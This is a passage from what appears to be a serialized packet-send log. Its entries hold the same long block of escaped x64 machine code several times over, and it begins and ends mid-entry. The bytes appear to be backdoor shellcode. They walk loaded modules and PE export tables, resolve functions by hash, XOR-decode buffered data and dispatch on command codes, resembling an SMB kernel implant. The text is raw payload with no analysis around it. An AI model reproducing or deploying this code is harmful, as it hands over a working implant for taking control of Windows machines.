\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 17, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 18, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x84\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xf9H\\\\x8b\\\\x95 \\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x9d\\\\x10\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x0f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x850\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85(\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d0\\\\xff\\\\xff\\\\xff\\\\xe8U\\\\x01\\\\x00\\\\x00f\\\\x89\\\\xc2H\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x18\\\\xff\\\\xff\\\\xff\\\\xe8I\\\\x01\\\\x00\\\\x00_H\\\\x81\\\\xc4\\\\x00\\\\x01\\\\x00\\\\x00]YZ[\\\\xc3VWH1\\\\xf6\\\\x8bp<H\\\\x01\\\\xc6f\\\\x81>PEu\\\\x12H\\\\x81\\\\xc6\\\\x88\\\\x00\\\\x00\\\\x00H1\\\\xff\\\\x8b>H\\\\x01\\\\xf8_^\\\\xc3H1\\\\xc0\\\\xeb\\\\xf8VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x07\\\\x01\\\\xc8H\\\\xff\\\\xc6\\\\xeb\\\\xe7_Y^\\\\xc3VWRH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0H\\\\xff\\\\xc6\\\\xe2\\\\xecZ_^\\\\xc3VQWH\\\\x89\\\\xc6H1\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\n\\\\x01\\\\xc8H\\\\xff\\\\xc6H\\\\xff\\\\xc6\\\\xeb\\\\xe4_Y^\\\\xc3VH\\\\x89\\\\xc6H\\\\x83\\\\xc6\\\\x18H1\\\\xc0\\\\x8b\\\\x06^\\\\xc3SeH\\\\x8b\\\\x04%8\\\\x00\\\\x00\\\\x00H\\\\[email\u00a0protected]\\\\x04H\\\\xc1\\\\xe8\\\\x0cH\\\\xc1\\\\xe0\\\\x0cH\\\\x8b\\\\x18f\\\\x81\\\\xfbMZt\\\\x08H-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xee[\\\\xc3WVQH1\\\\xffH\\\\x89\\\\xc6H1\\\\xc0\\\\x8b\\\\x04\\\\xbaH\\\\x01\\\\xf0\\\\[email\u00a0protected]\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x0eH\\\\xff\\\\xc7H9\\\\xdft\\\\x0b\\\\xeb\\\\xe4Y^_\\\\xc3H\\\\x89\\\\xf8\\\\xeb\\\\xf7H1\\\\xc0\\\\xeb\\\\xf2VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA\\\\x1cH\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA H\\\\x01\\\\xf0^\\\\xc3VH\\\\x89\\\\xc6H1\\\\xc0\\\\x8bA$H\\\\x01\\\\xf0^\\\\xc3H\\\\xd1\\\\xe1H\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3H\\\\x81\\\\xca\\\\x00\\\\x00\\\\xff\\\\xffH\\\\x81\\\\xf2\\\\x00\\\\x00\\\\xff\\\\xffH\\\\xc1\\\\xe2\\\\x02H\\\\x01\\\\xd1H1\\\\xd2\\\\x8b\\\\x11H\\\\x01\\\\xd0\\\\xc3WVSUATAUAVAWI\\\\x89\\\\xe4H\\\\x81\\\\xec\\\\x08\\\\x01\\\\x00\\\\x00I\\\\x89\\\\xcfH\\\\x8d-\\\\xe0\\\\xff\\\\xff\\\\xfff\\\\x81\\\\xe5\\\\x00\\\\xf0H\\\\x89MXH1\\\\xd2f\\\\x8bQ\\\\x02H\\\\x01\\\\xcaH;\\\\x11t\\\\x06H\\\\x8dI\\\\x08\\\\xeb\\\\xf5H\\\\x8dA(H\\\\x89E4H\\\\x8bA\\\\xf0H\\\\x89E(\\\\xe8(\\\\x01\\\\x00\\\\x00\\\\xe8{\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xed\\\\x00\\\\x00\\\\x00L\\\\x8bm<A\\\\x8bM\\\\xbc\\\\xe8\\\\xf9\\\\x00\\\\x00\\\\x00<#t\\\\r<wt\\\\x1d<\\\\xc8t#\\\\xe9\\\\xbd\\\\x00\\\\x00\\\\x00H\\\\x8bM(\\\\x8bED\\\\x89A\\\\x0e\\\\xb0\\\\x01\\\\x88A\\\\x12\\\\xe9\\\\xa5\\\\x00\\\\x00\\\\x00\\\\xe8\\\\xf4\\\\x00\\\\x00\\\\x00\\\\xe9\\\\x9b\\\\x00\\\\x00\\\\x00H1\\\\xdbH1\\\\xf6H1\\\\xffI\\\\x8bE\\\\xd8\\\\x8b\\\\x18\\\\x8bp\\\\x04\\\\x8bx\\\\x08\\\\x8bMH1\\\\xcb1\\\\xce1\\\\xcfA;u\\\\x10u{;]TH\\\\x8bELt\\\\x16\\\\xe8\\\\xd1\\\\x00\\\\x00\\\\x00H\\\\x8dS\\\\x04H1\\\\xc9\\\\xffU\\\\x10H\\\\x89EL\\\\x89]TH\\\\x85\\\\xc0t[H\\\\x01\\\\xf7H9\\\\xdfwOH)\\\\xf7H\\\\x01\\\\xc7WH\\\\x89\\\\xf1QI\\\\x8bu\\\\xe8\\\\xf3\\\\xa4YH\\\\xc1\\\\xe9\\\\x02^\\\\x8bUH1\\\\x16H\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf8H\\\\x01\\\\xd8H9\\\\xc6|!\\\\xffUL\\\\xe8\\\\x81\\\\x00\\\\x00\\\\x00\\\\x8bED\\\\xd1\\\\xe8H1\\\\xc9\\\\x88\\\\xc1H\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89ED\\\\xe8C\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00H\\\\x8bM(\\\\xb4\\\\x00f\\\\x01A\\\\x1eH\\\\x8bE L\\\\x89\\\\xf9L\\\\x89\\\\xe4A_A^A]A\\\\\\\\][^_\\\\xff`x1\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bED\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89EHY\\\\xc3Q\\\\xe8\\\\x0e\\\\x00\\\\x00\\\\x00H\\\\x8bE H\\\\x8bHxH\\\\x89HpY\\\\xc3SWH\\\\x83\\\\xec(H\\\\x8b]LH\\\\x85\\\\xdbt\\\\x131\\\\xc0H\\\\x89\\\\xdfH1\\\\xc9\\\\x8bMT\\\\xf3\\\\xaaH\\\\x89\\\\xd9\\\\xffU\\\\x18H1\\\\xc0\\\\x89ETH\\\\x89ELH\\\\x83\\\\xc4(_[\\\\xc3QVWH\\\\x8bu4H\\\\x8b\\\\x0e\\\\xe8H\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0u\\\\x11H\\\\x8dv\\\\x08H\\\\x8b\\\\x0e\\\\xe87\\\\x00\\\\x00\\\\x00H\\\\x85\\\\xc0t+H\\\\x89M4j\\\\x0cXH\\\\x8d\\\\xb1\\\\x90\\\\x00\\\\x00\\\\x00;\\\\x06t\\\\x08H\\\\x83\\\\xc6\\\\x08;\\\\x06u\\\\x11;F\\\\x04u\\\\x0cH\\\\x89u<H1\\\\xc0H\\\\xff\\\\xc0\\\\xeb\\\\x03H1\\\\xc0_^Y\\\\xc3H1\\\\xc0H9\\\\xc1}\\\\x03H\\\\xff\\\\xc0\\\\xc3\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00', 0.0)\", \"('send', 19, b'\\\\x89\\\\xecA_A^A]A\\\\\\\\^_][\\\\xc3SRQUH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x00\\\\x01\\\\x00\\\\x00WH\\\\x89\\\\xcfH\\\\x89\\\\xd8H\\\\x89\\\\x85\\\\x00\\\\xff\\\\xff\\\\xff\\\\xe8\\\\xbb\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8H\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x10\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x9a\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85\\\\x18\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x85\\\\x00\\\\xff\\\\xff\\\\xffH\\\\x8b\\\\x8d\\\\x08\\\\xff\\\\xff\\\\xff\\\\xe8\\\\x8f\\\\x01\\\\x00\\\\x00H\\\\x89\\\\x85 